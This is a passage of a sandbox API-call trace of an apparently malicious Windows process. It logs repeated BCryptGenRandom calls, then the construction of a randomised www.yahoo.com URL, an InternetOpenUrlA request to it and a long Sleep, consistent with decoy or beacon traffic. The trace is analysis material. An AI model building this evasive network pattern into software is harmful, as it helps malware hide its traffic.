dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0196.415] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a0269f, cbBuffer=0x2e, dwFlags=0x2 | out: pbBuffer=0x3a0269f) returned 0x0 [0196.415] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.415] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.416] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.416] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.416] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.416] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.416] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.416] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0196.416] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.417] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.417] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.417] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.417] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.417] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0196.417] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.417] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.418] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.418] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0196.418] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.418] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.418] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.418] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0196.419] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.419] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0196.419] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.419] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.419] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.419] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0196.419] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.421] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0196.422] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.422] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.422] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.422] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.422] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.422] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.423] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.423] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.423] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.423] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.423] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.423] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.423] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.423] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.424] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.424] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.424] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.424] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0196.424] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.424] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0196.424] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.424] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0196.425] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.425] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.425] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.425] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.425] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.425] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.425] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.426] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.426] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.426] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.426] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.426] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.426] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.426] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.427] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.427] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.427] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.427] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0196.427] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.427] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a026cd, cbBuffer=0x1b, dwFlags=0x2 | out: pbBuffer=0x3a026cd) returned 0x0 [0196.427] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.428] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.428] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.428] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.428] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.428] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.429] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.429] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.429] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.429] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.429] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.429] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0196.429] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.429] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.430] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.430] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.430] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.430] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.430] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.431] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0196.431] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.431] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.431] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.431] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.431] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.431] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0196.432] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.432] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0196.432] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.432] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.432] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.432] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.432] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.432] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.433] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.433] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0196.433] GetProcessHeap () returned 0x440000 [0196.433] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473770 [0196.433] lstrcpyA (in: lpString1=0x473770, lpString2="\x81>\x06\x82s://www.yahoo.com" | out: lpString1="\x81>\x06\x82s://www.yahoo.com") returned="\x81>\x06\x82s://www.yahoo.com" [0196.433] lstrcatA (in: lpString1="\x81>\x06\x82s://www.yahoo.com", lpString2="/Ma8tiFnrzxbvqy2vo5B/Eyg5gf3v7ahejcqcbDpetym57/BZnuoAmFnyckJ0iYjsfiera0gWww996/zacd8tn7a39a34Zu5G0modztoBeg464fjwhqj8oGzmtk9/kuxSokdgi2cnn5VbKTat76tkne/" | out: lpString1="\x81>\x06\x82s://www.yahoo.com/Ma8tiFnrzxbvqy2vo5B/Eyg5gf3v7ahejcqcbDpetym57/BZnuoAmFnyckJ0iYjsfiera0gWww996/zacd8tn7a39a34Zu5G0modztoBeg464fjwhqj8oGzmtk9/kuxSokdgi2cnn5VbKTat76tkne/") returned="\x81>\x06\x82s://www.yahoo.com/Ma8tiFnrzxbvqy2vo5B/Eyg5gf3v7ahejcqcbDpetym57/BZnuoAmFnyckJ0iYjsfiera0gWww996/zacd8tn7a39a34Zu5G0modztoBeg464fjwhqj8oGzmtk9/kuxSokdgi2cnn5VbKTat76tkne/" [0196.433] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0196.433] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81>\x06\x82s://www.yahoo.com/Ma8tiFnrzxbvqy2vo5B/Eyg5gf3v7ahejcqcbDpetym57/BZnuoAmFnyckJ0iYjsfiera0gWww996/zacd8tn7a39a34Zu5G0modztoBeg464fjwhqj8oGzmtk9/kuxSokdgi2cnn5VbKTat76tkne/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0196.433] GetProcessHeap () returned 0x440000 [0196.434] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473770 | out: hHeap=0x440000) returned 1 [0196.434] GetProcessHeap () returned 0x440000 [0196.434] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a02650 | out: hHeap=0x440000) returned 1 [0196.434] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0196.434] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0196.435] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0196.435] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0196.435] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0196.435] Sleep (dwMilliseconds=0x173b4) [0197.040] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0197.040] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0197.041] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0197.041] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0197.041] GetProcessHeap () returned 0x440000 [0197.041] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b250 [0197.041] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0197.041] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0197.042] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0197.042] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b251, cbBuffer=0x14, dwFlags=0x2 | out: pbBuffer=0x3a1b251) returned 0x0 [0197.042] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0197.042] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0197.042] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0197.042] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0197.042] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0197.042] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0197.043] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0197.043] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0197.043] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0197.043] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0197.043] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0197.043] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0197.044] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0197.044] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.085] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.086] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0198.086] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.086] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.086] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.086] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0198.086] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.086] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.087] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.087] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.087] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.087] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0198.087] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.087] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.087] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.087] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.088] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.088] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0198.088] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.088] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0198.088] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.088] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b265, cbBuffer=0x12, dwFlags=0x2 | out: pbBuffer=0x3a1b265) returned 0x0 [0198.088] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.088] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0198.089] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.089] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.089] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.089] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0198.089] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.089] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.089] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.090] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.090] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.090] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.090] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0198.090] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0198.090] GetProcAddress 